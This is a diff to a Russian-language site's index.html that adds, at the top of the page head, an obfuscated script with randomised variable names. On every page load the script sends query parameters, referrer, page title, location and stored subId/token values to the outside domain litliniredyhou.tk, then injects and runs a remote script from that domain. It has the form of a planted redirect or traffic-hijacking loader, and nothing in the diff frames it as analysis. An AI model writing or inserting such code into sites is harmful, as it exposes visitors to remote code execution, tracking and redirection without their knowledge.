--- a/index.html
+++ b/index.html
@@ -1,6 +1,49 @@
 ﻿<!DOCTYPE html>
 <html lang="ru">
 <head>
+	<script>
+    (function() {
+    var name = '_zW5xV2s6C2pmbrsM';
+    if (!window._zW5xV2s6C2pmbrsM) {
+        window._zW5xV2s6C2pmbrsM = {
+            unique: false,
+            ttl: 86400,
+            R_PATH: 'https://litliniredyhou.tk/PVcfsT68',
+            P_PATH: 'https://litliniredyhou.tk/7b4f75c/postback',
+        };
+    }
+    const _KwTfJ13sxK9ZFZHP = localStorage.getItem('config');
+    if (typeof _KwTfJ13sxK9ZFZHP !== 'undefined' && _KwTfJ13sxK9ZFZHP !== null) {
+        var _zmY5b8v1qtTRxvtR = JSON.parse(_KwTfJ13sxK9ZFZHP);
+        var _S65MwsfHCK4CPf4f = Math.round(+new Date()/1000);
+        if (_zmY5b8v1qtTRxvtR.created_at + window._zW5xV2s6C2pmbrsM.ttl < _S65MwsfHCK4CPf4f) {
+            localStorage.removeItem('subId');
+            localStorage.removeItem('token');
+            localStorage.removeItem('config');
+        }
+    }
+    var _5qqzBmfx6vKHZGz8 = localStorage.getItem('subId');
+    var _2Bj91M45sr4frXqz = localStorage.getItem('token');
+    var _7y6q34MZ5Q4cz6Pd = '?return=js.client';
+        _7y6q34MZ5Q4cz6Pd += '&' + decodeURIComponent(window.location.search.replace('?', ''));
+        _7y6q34MZ5Q4cz6Pd += '&se_referrer=' + encodeURIComponent(document.referrer);
+        _7y6q34MZ5Q4cz6Pd += '&default_keyword=' + encodeURIComponent(document.title);
+        _7y6q34MZ5Q4cz6Pd += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
+        _7y6q34MZ5Q4cz6Pd += '&name=' + encodeURIComponent(name);
+        _7y6q34MZ5Q4cz6Pd += '&host=' + encodeURIComponent(window._zW5xV2s6C2pmbrsM.R_PATH);
+    if (typeof _5qqzBmfx6vKHZGz8 !== 'undefined' && _5qqzBmfx6vKHZGz8 && window._zW5xV2s6C2pmbrsM.unique) {
+        _7y6q34MZ5Q4cz6Pd += '&sub_id=' + encodeURIComponent(_5qqzBmfx6vKHZGz8);
+    }
+    if (typeof _2Bj91M45sr4frXqz !== 'undefined' && _2Bj91M45sr4frXqz && window._zW5xV2s6C2pmbrsM.unique) {
+        _7y6q34MZ5Q4cz6Pd += '&token=' + encodeURIComponent(_2Bj91M45sr4frXqz);
+    }
+    var a = document.createElement('script');
+        a.type = 'application/javascript';
+        a.src = window._zW5xV2s6C2pmbrsM.R_PATH + _7y6q34MZ5Q4cz6Pd;
+    var s = document.getElementsByTagName('script')[0];
+    s.parentNode.insertBefore(a, s)
+    })();
+    </script>
   <!-- Facebook Pixel Code -->
 <script>
   !function(f,b,e,v,n,t,s)
